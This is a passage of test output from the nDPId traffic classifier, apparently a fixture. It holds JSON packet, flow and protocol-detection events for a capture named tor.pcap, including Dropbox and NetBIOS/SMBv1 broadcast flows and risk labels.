00358{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":83,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821669834,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":83,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821669834,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00192{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":83,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821672213} 00178{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":83,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821672213}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":86,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821673254,"flow_last_seen":1383821673254,"flow_idle_time":180000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1383821673254,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":86,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821673254,"flow_last_seen":1383821673254,"flow_idle_time":180000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1383821673254,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00632{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1383821673254,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":186,"pkt_l4_len":152,"thread_ts_msec":1383821673254,"pkt":"\/\/\/\/\/\/\/\/UlQAwqwfCABFAACsAABAAEARtfDAqAEBwKgB\/0RcRFwAmDDeeyJob3N0X2ludCI6IDY3Njg3OTk3NiwgInZlcnNpb24iOiBbMSwgOF0sICJkaXNwbGF5bmFtZSI6ICI2NzY4Nzk5NzYiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsxNjc4NDEyMTYsIDE4MTA4Mzk2OCwgMTgxMDgwMzI0LCAyOTU0NDE3M119"} 00632{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1383821673254,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":186,"pkt_l4_len":152,"thread_ts_msec":1383821673254,"pkt":"\/\/\/\/\/\/\/\/UlQAwqwfCABFAACsAABAAEARtfDAqAEBwKgB\/0RcRFwAmDDeeyJob3N0X2ludCI6IDY3Njg3OTk3NiwgInZlcnNpb24iOiBbMSwgOF0sICJkaXNwbGF5bmFtZSI6ICI2NzY4Nzk5NzYiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsxNjc4NDEyMTYsIDE4MTA4Mzk2OCwgMTgxMDgwMzI0LCAyOTU0NDE3M119"}
00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821673254,"flow_last_seen":1383821673254,"flow_idle_time":180000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1383821673254,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821673254,"flow_last_seen":1383821673254,"flow_idle_time":180000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1383821673254,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
00358{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":87,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821673254,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":87,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821673254,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00192{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":87,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821674212} 00178{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":87,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821674212}
00358{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":88,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821673254,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":88,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821673254,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00192{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":88,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821676212} 00178{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":88,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821676212}
00358{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":89,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821673254,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":89,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821673254,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00192{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":89,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821678212} 00178{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":89,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821678212}
00358{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":90,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821673254,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":90,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821673254,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00192{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":90,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821680212} 00178{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":90,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821680212}
00358{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":91,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821673254,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":91,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821673254,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00192{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":91,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821682212} 00178{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":91,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821682212}
00358{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":92,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821673254,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":92,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821673254,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00192{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":92,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821684212} 00178{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":92,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821684212}
00358{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":93,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821673254,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":93,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821673254,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00192{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":93,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821686212} 00178{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":93,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821686212}
00358{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":94,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821673254,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":94,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821673254,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00192{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":94,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821688212} 00178{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":94,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821688212}
00358{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":95,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821673254,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":95,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821673254,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00192{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":95,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821690212} 00178{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":95,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821690212}
00358{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":96,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821673254,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":96,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821673254,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00192{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":96,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821692212} 00178{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":96,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821692212}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"tor.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821693159,"flow_last_seen":1383821693159,"flow_idle_time":180000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":0,"thread_ts_msec":1383821693159,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"tor.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821693159,"flow_last_seen":1383821693159,"flow_idle_time":180000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":0,"thread_ts_msec":1383821693159,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00720{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"tor.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1383821693159,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":252,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":252,"pkt_l4_len":218,"thread_ts_msec":1383821693159,"pkt":"\/\/\/\/\/\/\/\/UlQAWul3CABFAADuA4EAAIARsTLAqAH8wKgB\/wCKAIoA2itVEQLJT8CoAfwAigDEAAAgRUZFT0VFRUpFQkVPQ05GQUVEQ0FDQUNBQ0FDQUNBQUEAIEFCQUNGUEZQRU5GREVDRkNFUEZIRkRFRkZQRlBBQ0FCAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAKgAAAAAAAAAAAOgDAAAAAAAAAAAqAFYAAwABAAEAAgA7AFxNQUlMU0xPVFxCUk9XU0UADACguw0AV09SS0dST1VQAAAAAAAAAAMKABAAgP4HAABFTkRJQU4tUEMA"} 00720{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"tor.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1383821693159,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":252,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":252,"pkt_l4_len":218,"thread_ts_msec":1383821693159,"pkt":"\/\/\/\/\/\/\/\/UlQAWul3CABFAADuA4EAAIARsTLAqAH8wKgB\/wCKAIoA2itVEQLJT8CoAfwAigDEAAAgRUZFT0VFRUpFQkVPQ05GQUVEQ0FDQUNBQ0FDQUNBQUEAIEFCQUNGUEZQRU5GREVDRkNFUEZIRkRFRkZQRlBBQ0FCAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAKgAAAAAAAAAAAOgDAAAAAAAAAAAqAFYAAwABAAEAAgA7AFxNQUlMU0xPVFxCUk9XU0UADACguw0AV09SS0dST1VQAAAAAAAAAAMKABAAgP4HAABFTkRJQU4tUEMA"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"tor.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821693159,"flow_last_seen":1383821693159,"flow_idle_time":180000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":0,"thread_ts_msec":1383821693159,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"tor.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821693159,"flow_last_seen":1383821693159,"flow_idle_time":180000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":0,"thread_ts_msec":1383821693159,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
00358{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":98,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821693159,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":98,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821693159,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00192{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":98,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821694212} 00178{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":98,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821694212}
00358{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":99,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821693159,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":99,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821693159,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00192{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":99,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821696212} 00178{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":99,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821696212}
00359{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":100,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821693159,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00345{"packet_event_id":1,"packet_event_name":"packet","packet_id":100,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821693159,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00193{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":100,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821698212} 00179{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":100,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821698212}
00359{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":101,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821693159,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00345{"packet_event_id":1,"packet_event_name":"packet","packet_id":101,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821693159,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00193{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":101,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821700216} 00179{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":101,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821700216}
